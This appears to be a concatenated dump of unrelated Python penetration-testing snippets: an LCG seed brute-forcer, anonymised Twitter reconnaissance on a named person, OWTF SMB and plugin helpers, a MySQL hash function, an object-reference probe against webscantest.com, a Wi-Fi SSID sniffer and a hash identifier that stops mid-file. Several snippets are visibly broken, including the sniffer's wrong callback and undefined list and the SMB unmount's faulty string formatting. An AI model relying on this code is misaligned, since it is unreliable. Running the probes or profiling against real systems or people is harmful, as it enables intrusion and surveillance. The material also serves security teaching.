for i in range(100000, 99999999):
a = str((1664525 * int(str(i)+'00') + 1013904223) % 2**31)
if a[-2:] == "47":
b = str((1664525 * int(a) + 1013904223) % 2**31)
if b[-2:] == "46":
c = str((1664525 * int(b) + 1013904223) % 2**31)
if c[-2:] == "57":
d = str((1664525 * int(c) + 1013904223) % 2**31)
if d[-2:] == "56":
e = str((1664525 * int(d) + 1013904223) % 2**31)
if e[-2:] == "07":
f = str((1664525 * int(e) + 1013904223) % 2**31)
if f[-2:] == "38":
g = str((1664525 * int(f) + 1013904223) % 2**31)
if g[-2:] == "81":
h = str((1664525 * int(g) + 1013904223) % 2**31)
if h[-2:] == "32":
j = str((1664525 * int(h) + 1013904223) % 2**31)
if j[-2:] == "19":
k = str((1664525 * int(j) + 1013904223) % 2**31)
if k[-2:] == "70":
l = str((1664525 * int(k) + 1013904223) % 2**31)
if l[-2:] == "53":
print "potential number found: "+l
print "next 9 values are:"
for i in range(1, 10):
l = str((1664525 * int(l) + 1013904223) % 2**31)
print l[-2:] | 38.060606 | 115 | 0.51087 |
cybersecurity-penetration-testing | #!/usr/bin/python
# -*- coding: utf-8 -*-
import json
import urllib
from anonBrowser import *
class reconPerson:
def __init__(self,first_name,last_name,\
job='',social_media={}):
self.first_name = first_name
self.last_name = last_name
self.job = job
self.social_media = social_media
def __repr__(self):
return self.first_name + ' ' +\
self.last_name + ' has job ' + self.job
def get_social(self, media_name):
if self.social_media.has_key(media_name):
return self.social_media[media_name]
return None
def query_twitter(self, query):
query = urllib.quote_plus(query)
results = []
browser = anonBrowser()
response = browser.open(\
'http://search.twitter.com/search.json?q='+ query)
json_objects = json.load(response)
for result in json_objects['results']:
new_result = {}
new_result['from_user'] = result['from_user_name']
new_result['geo'] = result['geo']
new_result['tweet'] = result['text']
results.append(new_result)
return results
ap = reconPerson('Boondock', 'Saint')
print ap.query_twitter(\
'from:th3j35t3r since:2010-01-01 include:retweets')
| 26.382979 | 62 | 0.581649 |
owtf | from owtf.plugin.helper import plugin_helper
DESCRIPTION = "Plugin to assist manual testing"
def run(PluginInfo):
Content = plugin_helper.HtmlString("Intended to show helpful info in the future")
return Content
| 23.777778 | 85 | 0.765766 |
PenTesting | from hashlib import sha1
from re import subn
def hash(word):
nr = 1345345333
add = 7
nr2 = 0x12345671
for c in (ord(x) for x in word if x not in (' ', '\t')):
nr^= (((nr & 63)+add)*c)+ (nr << 8) & 0xFFFFFFFF
nr2= (nr2 + ((nr2 << 8) ^ nr)) & 0xFFFFFFFF
add= (add + c) & 0xFFFFFFFF
return {"%08x%08x" % (nr & 0x7FFFFFFF,nr2 & 0x7FFFFFFF):word.strip('\n')}
| 28.5 | 77 | 0.521845 |
owtf | """
owtf.protocols.smb
~~~~~~~~~~~~~~~~~~
This is the handler for the Social Engineering Toolkit (SET) trying to overcome
the limitations of set-automate.
"""
import logging
import os
from owtf.db.session import get_scoped_session
from owtf.shell import pexpect_sh
from owtf.utils.file import FileOperations
__all__ = ["smb"]
class SMB(pexpect_sh.PExpectShell):
def __init__(self):
# Calling parent class to do its init part.
pexpect_sh.PExpectShell.__init__(self)
self.session = get_scoped_session()
self.command_time_offset = "SMBCommand"
self.mounted = False
def is_mounted(self):
return self.mounted
def set_mounted(self, value):
self.mounted = value
def check_mount_point_existence(self, options):
if not os.path.exists(options["SMB_MOUNT_POINT"]):
FileOperations.make_dirs(options["SMB_MOUNT_POINT"])
def mount(self, options, plugin_info):
if self.is_mounted():
return True
logging.info("Initialising shell..")
self.open(options, plugin_info)
logging.info("Ensuring Mount Point %s exists...", options["SMB_MOUNT_POINT"])
self.check_mount_point_existence(options)
mount_cmd = "smbmount //{}/{} {}".format(options["SMB_HOST"], options["SMB_SHARE"], options["SMB_MOUNT_POINT"])
if options["SMB_USER"]: # Pass user if specified.
mount_cmd += " -o user={}".format(options["SMB_USER"])
logging.info("Mounting share..")
self.run(mount_cmd, plugin_info)
self.expect("Password:")
if options["SMB_PASS"]: # Pass password if specified.
self.run(options["SMB_PASS"], plugin_info)
else:
self.run("", plugin_info) # Send blank line.
self.expect("#")
self.set_mounted(True)
def transfer(self):
operation = False
if self.options["SMB_DOWNLOAD"]:
self.download("{}/{}".format(self.options["SMB_MOUNT_POINT"], self.options["SMB_DOWNLOAD"]), ".")
operation = True
if self.options["SMB_UPLOAD"]:
self.upload(self.options["SMB_UPLOAD"], self.options["SMB_MOUNT_POINT"])
operation = True
if not operation:
logging.info("Nothing to do: no SMB_DOWNLOAD or SMB_UPLOAD specified..")
def unmount(self, plugin_info):
if self.is_mounted():
self.shell_exec_monitor(
session=self.session, command="umount %s".format(self.options["SMB_MOUNT_POINT"]), plugin_info=dict()
)
self.set_mounted(False)
self.close(plugin_info)
def upload(self, file_path, mount_point):
logging.info("Copying %s to %s", file_path, mount_point)
self.shell_exec_monitor(
session=self.session, command="cp -r {} {}".format(file_path, mount_point), plugin_info=dict()
)
def download(self, remote_file_path, target_dir):
logging.info("Copying %s to %s", remote_file_path, target_dir)
self.shell_exec_monitor(
session=self.session, command="cp -r {} {}".format(remote_file_path, target_dir), plugin_info=dict()
)
smb = SMB()
| 34.898876 | 119 | 0.60645 |
Effective-Python-Penetration-Testing | import mechanize
url = "http://www.webscantest.com/business/access.php?serviceid="
attackNumber = 1
for i in range(5):
res = mechanize.urlopen(url+str(i))
content = res.read()
# check if the content is accessible
if content.find("You service") > 0:
print "Possible Direct Object Reference"
output = open('response/'+str(attackNumber)+'.txt', 'w')
output.write(content)
output.close()
print attackNumber
attackNumber += 1
| 24.157895 | 65 | 0.656184 |
Python-Penetration-Testing-Cookbook | from scapy.all import *
ssid = []
def parseSSID(pkt):
if pkt.haslayer(Dot11):
print(pkt.show())
if pkt.type == 0 and pkt.subtype == 8:
if pkt.addr2 not in ap_list:
ap_list.append(pkt.addr2)
print("SSID: pkt.info")
sniff(iface='en0', prn=ssid, count=10, timeout=3, store=0)
| 25.153846 | 58 | 0.557522 |
Penetration-Testing-Study-Notes | #!/usr/bin/env python
logo=''' #########################################################################
# modified, adapted and encreased for www.marcoramilli.blogspot.com #
#########################################################################'''
algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"}
# hash.islower() minusculas
# hash.isdigit() numerico
# hash.isalpha() letras
# hash.isalnum() alfanumerico
def CRC16():
hs='4607'
if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("101020")
def CRC16CCITT():
hs='3d08'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("101040")
def FCS16():
hs='0e5b'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("101060")
def CRC32():
hs='b33fd057'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("102040")
def ADLER32():
hs='0607cb42'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("102020")
def CRC32B():
hs='b764a0d9'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("102060")
def XOR32():
hs='0000003f'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("102080")
def GHash323():
hs='80000000'
if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("103040")
def GHash325():
hs='85318985'
if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("103020")
def DESUnix():
hs='ZiY8YtDKXJwYQ'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False:
jerar.append("104020")
def MD5Half():
hs='ae11fd697ec92c7c'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("105060")
def MD5Middle():
hs='7ec92c7c98de3fac'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("105040")
def MySQL():
hs='63cea4673fd25f46'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("105020")
def DomainCachedCredentials():
hs='f42005ec1afe77967cbc83dce1b4d714'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106025")
def Haval128():
hs='d6e3ec49aa0f138a619f27609022df10'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106160")
def Haval128HMAC():
hs='3ce8b0ffd75bc240fc7d967729cd6637'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106165")
def MD2():
hs='08bbef4754d98806c373f2cd7d9a43c4'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106060")
def MD2HMAC():
hs='4b61b72ead2b0eb0fa3b8a56556a6dca'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106120")
def MD4():
hs='a2acde400e61410e79dacbdfc3413151'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106040")
def MD4HMAC():
hs='6be20b66f2211fe937294c1c95d1cd4f'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106100")
def MD5():
hs='ae11fd697ec92c7c98de3fac23aba525'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106020")
def MD5HMAC():
hs='d57e43d2c7e397bf788f66541d6fdef9'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106080")
def MD5HMACWordpress():
hs='3f47886719268dfa83468630948228f6'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106140")
def NTLM():
hs='cc348bace876ea440a28ddaeb9fd3550'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106029")
def RAdminv2x():
hs='baea31c728cbf0cd548476aa687add4b'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106027")
def RipeMD128():
hs='4985351cd74aff0abc5a75a0c8a54115'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106180")
def RipeMD128HMAC():
hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106185")
def SNEFRU128():
hs='4fb58702b617ac4f7ca87ec77b93da8a'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106200")
def SNEFRU128HMAC():
hs='59b2b9dcc7a9a7d089cecf1b83520350'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106205")
def Tiger128():
hs='c086184486ec6388ff81ec9f23528727'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106220")
def Tiger128HMAC():
hs='c87032009e7c4b2ea27eb6f99723454b'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106225")
def md5passsalt():
hs='5634cc3b922578434d6e9342ff5913f7'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106240")
def md5saltmd5pass():
hs='245c5763b95ba42d4b02d44bbcd916f1'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106260")
def md5saltpass():
hs='22cc5ce1a1ef747cd3fa06106c148dfa'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106280")
def md5saltpasssalt():
hs='469e9cdcaff745460595a7a386c4db0c'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106300")
def md5saltpassusername():
hs='9ae20f88189f6e3a62711608ddb6f5fd'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106320")
def md5saltmd5pass():
hs='aca2a052962b2564027ee62933d2382f'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106340")
def md5saltmd5passsalt():
hs='de0237dc03a8efdf6552fbe7788b2fdd'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106360")
def md5saltmd5passsalt():
hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106380")
def md5saltmd5saltpass():
hs='d8f3b3f004d387086aae24326b575b23'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106400")
def md5saltmd5md5passsalt():
hs='81f181454e23319779b03d74d062b1a2'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106420")
def md5username0pass():
hs='e44a60f8f2106492ae16581c91edb3ba'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106440")
def md5usernameLFpass():
hs='654741780db415732eaee12b1b909119'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106460")
def md5usernamemd5passsalt():
hs='954ac5505fd1843bbb97d1b2cda0b98f'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106480")
def md5md5pass():
hs='a96103d267d024583d5565436e52dfb3'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106500")
def md5md5passsalt():
hs='5848c73c2482d3c2c7b6af134ed8dd89'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106520")
def md5md5passmd5salt():
hs='8dc71ef37197b2edba02d48c30217b32'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106540")
def md5md5saltpass():
hs='9032fabd905e273b9ceb1e124631bd67'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106560")
def md5md5saltmd5pass():
hs='8966f37dbb4aca377a71a9d3d09cd1ac'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106580")
def md5md5usernamepasssalt():
hs='4319a3befce729b34c3105dbc29d0c40'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106600")
def md5md5md5pass():
hs='ea086739755920e732d0f4d8c1b6ad8d'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106620")
def md5md5md5md5pass():
hs='02528c1f2ed8ac7d83fe76f3cf1c133f'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106640")
def md5md5md5md5md5pass():
hs='4548d2c062933dff53928fd4ae427fc0'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106660")
def md5sha1pass():
hs='cb4ebaaedfd536d965c452d9569a6b1e'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106680")
def md5sha1md5pass():
hs='099b8a59795e07c334a696a10c0ebce0'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106700")
def md5sha1md5sha1pass():
hs='06e4af76833da7cc138d90602ef80070'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106720")
def md5strtouppermd5pass():
hs='519de146f1a658ab5e5e2aa9b7d2eec8'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106740")
def LineageIIC4():
hs='0x49a57f66bd3d5ba6abda5579c264a0e4'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0:
jerar.append("107080")
def MD5phpBB3():
hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0:
jerar.append("107040")
def MD5Unix():
hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0:
jerar.append("107060")
def MD5Wordpress():
hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0:
jerar.append("107020")
def MD5APR():
hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0:
jerar.append("108020")
def Haval160():
hs='a106e921284dd69dad06192a4411ec32fce83dbb'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109100")
def Haval160HMAC():
hs='29206f83edc1d6c3f680ff11276ec20642881243'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109200")
def MySQL5():
hs='9bb2fb57063821c762cc009f7584ddae9da431ff'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109040")
def MySQL160bit():
hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0:
jerar.append("109060")
def RipeMD160():
hs='dc65552812c66997ea7320ddfb51f5625d74721b'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109120")
def RipeMD160HMAC():
hs='ca28af47653b4f21e96c1235984cb50229331359'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109180")
def SHA1():
hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109020")
def SHA1HMAC():
hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109140")
def SHA1MaNGOS():
hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109220")
def SHA1MaNGOS2():
hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109240")
def Tiger160():
hs='c086184486ec6388ff81ec9f235287270429b225'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109080")
def Tiger160HMAC():
hs='6603161719da5e56e1866e4f61f79496334e6a10'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109160")
def sha1passsalt():
hs='f006a1863663c21c541c8d600355abfeeaadb5e4'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109260")
def sha1saltpass():
hs='299c3d65a0dcab1fc38421783d64d0ecf4113448'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109280")
def sha1saltmd5pass():
hs='860465ede0625deebb4fbbedcb0db9dc65faec30'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109300")
def sha1saltmd5passsalt():
hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109320")
def sha1saltsha1pass():
hs='58714327f9407097c64032a2fd5bff3a260cb85f'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109340")
def sha1saltsha1saltsha1pass():
hs='cc600a2903130c945aa178396910135cc7f93c63'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109360")
def sha1usernamepass():
hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109380")
def sha1usernamepasssalt():
hs='00025111b3c4d0ac1635558ce2393f77e94770c5'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109400")
def sha1md5pass():
hs='fa960056c0dea57de94776d3759fb555a15cae87'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("1094202")
def sha1md5passsalt():
hs='1dad2b71432d83312e61d25aeb627593295bcc9a'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109440")
def sha1md5sha1pass():
hs='8bceaeed74c17571c15cdb9494e992db3c263695'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109460")
def sha1sha1pass():
hs='3109b810188fcde0900f9907d2ebcaa10277d10e'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109480")
def sha1sha1passsalt():
hs='780d43fa11693b61875321b6b54905ee488d7760'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109500")
def sha1sha1passsubstrpass03():
hs='5ed6bc680b59c580db4a38df307bd4621759324e'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109520")
def sha1sha1saltpass():
hs='70506bac605485b4143ca114cbd4a3580d76a413'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109540")
def sha1sha1sha1pass():
hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109560")
def sha1strtolowerusernamepass():
hs='79f575543061e158c2da3799f999eb7c95261f07'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109580")
def Haval192():
hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("110040")
def Haval192HMAC():
hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("110080")
def Tiger192():
hs='c086184486ec6388ff81ec9f235287270429b2253b248a70'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("110020")
def Tiger192HMAC():
hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("110060")
def MD5passsaltjoomla1():
hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0:
jerar.append("112020")
def SHA1Django():
hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0:
jerar.append("113020")
def Haval224():
hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("114040")
def Haval224HMAC():
hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("114080")
def SHA224():
hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("114020")
def SHA224HMAC():
hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("114060")
def SHA256():
